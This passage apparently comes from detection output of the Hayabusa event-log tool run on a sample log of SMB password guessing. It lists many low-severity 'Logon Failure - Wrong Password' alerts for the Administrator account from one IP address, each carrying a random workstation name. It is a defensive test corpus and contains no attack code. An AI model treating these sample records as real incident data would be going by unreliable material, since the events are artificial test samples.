NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: 